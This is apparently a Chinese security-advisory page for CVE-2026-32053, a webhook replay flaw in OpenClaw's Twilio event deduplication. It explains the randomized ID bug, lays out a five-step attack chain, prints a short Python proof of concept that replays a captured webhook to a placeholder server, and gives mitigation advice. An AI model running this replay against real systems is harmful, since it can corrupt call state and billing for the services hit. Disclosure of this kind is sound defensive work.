CVE-2026-32053 CVSS 6.5 中危

CVE-2026-32053 OpenClaw Webhook重放漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32053

漏洞类型

重放攻击

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.2.23之前的版本中存在一个安全漏洞，涉及Twilio webhook事件去重机制的处理逻辑。该漏洞源于系统在规范化事件ID时引入了随机性，导致每次解析同一事件时都会生成不同的ID。这使得攻击者能够绕过管理器的去重检查，成功重放Twilio webhook事件。利用此漏洞可能导致系统处理重复或过时的呼叫状态转换，进而引发呼叫处理异常及状态数据损坏，对系统的完整性和可用性造成威胁。

技术细节

该漏洞位于OpenClaw处理Twilio webhook事件的去重模块中。正常情况下，系统应依赖稳定的事件ID来识别并拒绝重复的请求。然而，在受影响的版本中，代码在对事件ID进行规范化处理以生成缓存键时，使用了包含随机因子的算法。这意味着，即使攻击者发送的是完全相同的Twilio事件载荷，OpenClaw在每次解析时生成的内部规范化ID都是独一无二的。去重管理器通过查询该规范化ID来判断事件是否已处理。由于ID的随机性，重放的事件总能生成一个新的ID，导致缓存查询失败，从而绕过了去重机制。攻击者只需捕获合法的webhook请求并向服务器重放，即可欺骗系统接受已过时的指令。这会破坏呼叫状态机的完整性，导致如挂断正在进行的通话、错误计费或状态不一致等后果。该漏洞利用难度低，无需认证且无用户交互即可通过网络触发。

攻击链分析

STEP 1

步骤1：侦察

攻击者识别出目标正在使用受影响版本的OpenClaw（2026.2.23之前），并确定其Twilio Webhook端点。

STEP 2

步骤2：捕获

攻击者拦截或获取一个合法的Twilio webhook事件请求包，包含有效的CallSid和状态信息。

STEP 3

步骤3：重放

攻击者将捕获到的请求原封不动地重新发送给OpenClaw的Webhook端点。

STEP 4

步骤4：绕过

OpenClaw在处理重放请求时，由于规范化ID的随机性，未能识别出这是重复事件，绕过了去重检查。

STEP 5

步骤5：影响

系统执行重复的呼叫状态转换逻辑，导致呼叫状态混乱、逻辑错误或服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import time

# Target URL
url = "http://target-openclaw-server/webhook/twilio"

# Sample legitimate Twilio webhook payload (captured from network)
payload = {
    "CallSid": "CA1234567890ABCDE",
    "From": "+1234567890",
    "To": "+0987654321",
    "CallStatus": "ringing",
    "CallerName": "Attacker"
}

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    "X-Twilio-Signature": "valid_signature_or_bypass"
}

print("[+] Sending initial webhook request...")
r1 = requests.post(url, data=payload, headers=headers)
print(f"Status Code: {r1.status_code}")

print("[+] Waiting 2 seconds...")
time.sleep(2)

print("[+] Replaying the same webhook request (Replay Attack)...")
# Due to the randomization in ID normalization, this replay should bypass deduplication
r2 = requests.post(url, data=payload, headers=headers)
print(f"Status Code: {r2.status_code}")

if r2.status_code == 200:
    print("[!] Replay successful! Duplicate event processed.")
else:
    print("[-] Replay failed.")

影响范围

OpenClaw < 2026.2.23

防御指南

临时缓解措施

如果无法立即升级版本，建议在OpenClaw前置的网关或反向代理（如Nginx）层面实施基于请求体哈希的去重策略，限制相同CallSid的请求处理频率。此外，可以暂时监控并阻断异常的高频Webhook请求，以减轻重放攻击带来的影响。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表